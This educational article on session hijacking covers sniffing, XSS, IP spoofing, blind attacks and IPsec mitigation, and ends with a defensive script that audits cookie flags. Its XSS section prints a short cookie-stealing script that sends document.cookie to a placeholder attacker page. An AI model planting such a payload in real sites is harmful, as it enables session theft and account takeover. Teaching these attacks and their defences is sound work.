Session Hijacking

Ria Puri
IEEE Student Branch DIT University
Dec 10, 2020

What is Session Hijacking?
TCP session hijacking is a security attack on a user session over a protected network. The most common method of session hijacking is called IP spoofing, in which the attacker uses source-routed IP packets to insert commands into an active connection between two nodes on the network and to pose as one of the authenticated users. This type of attack is possible because authentication is only performed at the beginning of a TCP session.

Another type of session hijacking is known as a man-in-the-middle attack, in which the attacker, using a sniffer, can observe the communication between devices and collect the information that is transmitted.

Different ways of session hijacking:

There are many ways to do Session Hijacking. Some of them are given below –

· Using Packet Sniffers
As the figure above shows, the attacker captures the victim's session ID with a packet sniffer and uses it to gain access to the server.

· Cross Site Scripting (XSS Attack)
The attacker can also capture the victim's session ID through an XSS attack that uses JavaScript. If the attacker sends the victim a crafted link containing malicious JavaScript, then when the victim clicks the link, the JavaScript runs and carries out the instructions written by the attacker.

<SCRIPT type="text/javascript">
var adr = '../attacker.php?victim_cookie=' + escape(document.cookie);
</SCRIPT>

· IP Spoofing
Spoofing is pretending to be someone else. It is a technique used to gain unauthorized access to a computer by using the IP address of a trusted host. To use this method, the attacker must obtain the client's IP address and inject their own packets, spoofed with the client's IP address, into the TCP session, in order to trick the server into believing it is communicating with the victim, i.e. the original host.

· Blind Attack
If the attacker is unable to sniff the packets and guess the sequence number expected by the server, brute-force combinations of sequence numbers can be attempted.

Mitigation

To protect the network from session hijacking, the defender must apply security measures at both the application level and the network level. Network-level hijacking can be prevented by encrypting packets so that the hijacker cannot decipher the packet headers to obtain any information that would aid in spoofing. This encryption can be provided using protocols such as IPSEC, SSL, SSH etc. The Internet security protocol (IPSEC) has the ability to encrypt a packet with a key shared between the two parties involved in the communication. IPsec operates in two modes: Transport and Tunnel.

In Transport mode only the data sent in the packet is encrypted, while in Tunnel mode both the packet headers and the data are encrypted, so it is more restrictive.
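The application-level side of this mitigation can be checked on the session cookie itself. The following is an added example, not code from the original article: it audits Set-Cookie headers for the two attributes that close the sniffing and document.cookie theft paths described above. The cookie names and header values are assumptions constructed for illustration.

```javascript
// Added example; the header values in SAMPLE_HEADERS are constructed test data.
const SESSION_COOKIE_NAMES = new Set(['PHPSESSID', 'JSESSIONID', 'sid']); // assumed names

// Split one Set-Cookie value into its name and a lowercase attribute map.
function parseSetCookie(header) {
  const parts = header.split(';').map((p) => p.trim()).filter(Boolean);
  const first = parts[0] || '';
  const eq = first.indexOf('=');
  if (eq < 1) return null; // no "name=value" pair at the front
  const attrs = {};
  for (const p of parts.slice(1)) {
    const i = p.indexOf('=');
    // Attribute names are case-insensitive; flags such as Secure carry no value.
    attrs[(i === -1 ? p : p.slice(0, i)).toLowerCase()] = i === -1 ? true : p.slice(i + 1);
  }
  return { name: first.slice(0, eq), attrs };
}

// Findings for one cookie: which theft path from the article stays open.
function auditCookie(cookie) {
  const findings = [];
  // Without HttpOnly, injected script can read the cookie via document.cookie.
  if (!('httponly' in cookie.attrs)) findings.push('missing HttpOnly');
  // Without Secure, the cookie also travels over plain HTTP, where a sniffer sees it.
  if (!('secure' in cookie.attrs)) findings.push('missing Secure');
  return findings;
}

// Audit every session cookie set by a response; returns only cookies with findings.
function auditResponse(setCookieHeaders) {
  const report = [];
  for (const header of setCookieHeaders) {
    const cookie = parseSetCookie(header);
    if (!cookie || !SESSION_COOKIE_NAMES.has(cookie.name)) continue;
    const findings = auditCookie(cookie);
    if (findings.length) report.push({ name: cookie.name, findings });
  }
  return report;
}

const SAMPLE_HEADERS = [
  'PHPSESSID=3f9a1c; Path=/',                    // both flags absent
  'JSESSIONID=9d2e; path=/; secure; httponly',   // lowercase attributes still count
  'sid=HttpOnly; Path=/Secure',                  // flag words inside value and path only
  'theme=dark; Path=/',                          // not a session cookie, skipped
];

console.log(JSON.stringify(auditResponse(SAMPLE_HEADERS), null, 2));
```

The third sample shows why the check parses attributes instead of searching the header for the words "HttpOnly" and "Secure": a substring match would pass a cookie that carries neither flag.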

Session hijacking is a major threat to networks and web applications, as most systems are vulnerable to it.
